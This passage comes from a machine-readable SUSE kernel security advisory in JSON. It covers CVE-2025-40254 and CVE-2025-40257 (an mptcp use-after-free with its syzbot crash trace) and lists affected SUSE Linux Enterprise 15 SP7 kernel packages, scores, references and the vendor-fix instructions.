"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40254"
},
{
"cve": "CVE-2025-40257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix a race in mptcp_pm_del_add_timer()\n\nmptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, \u0026entry-\u003eadd_timer)\nwhile another might have free entry already, as reported by syzbot.\n\nAdd RCU protection to fix this issue.\n\nAlso change confusing add_timer variable with stop_timer boolean.\n\nsyzbot report:\n\nBUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\nRead of size 4 at addr ffff8880311e4150 by task kworker/1:1/44\n\nCPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nWorkqueue: events mptcp_worker\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\n sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631\n mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362\n mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174\n tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361\n tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441\n tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931\n tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374\n ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n __netif_receive_skb_one_core net/core/dev.c:6079 [inline]\n __netif_receive_skb+0x143/0x380 net/core/dev.c:6192\n process_backlog+0x31e/0x900 net/core/dev.c:6544\n __napi_poll+0xb6/0x540 net/core/dev.c:7594\n napi_poll net/core/dev.c:7657 [inline]\n net_rx_action+0x5f7/0xda0 net/core/dev.c:7784\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302\n mptcp_pm_send_ack net/mptcp/pm.c:210 [inline]\n mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1\n mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 44:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:400 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748\n kmalloc_noprof include/linux/slab.h:957 [inline]\n mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385\n mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355\n mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline]\n __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529\n mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n\nFreed by task 6630:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587\n kasan_save_free_info mm/kasan/kasan.h:406 [inline]\n poison_slab_object m\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40257",
"url": "https://www.suse.com/security/cve/CVE-2025-40257"
},
{
"category": "external",
"summary": "SUSE Bug 1254842 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "external",
"summary": "SUSE Bug 1257242 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1257242"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
